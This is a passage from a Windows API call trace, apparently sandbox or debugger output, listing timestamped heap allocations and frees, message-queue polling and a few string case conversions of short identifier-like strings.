(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0189.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0189.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0189.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.079] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0189.079] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.079] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.080] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.080] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.082] 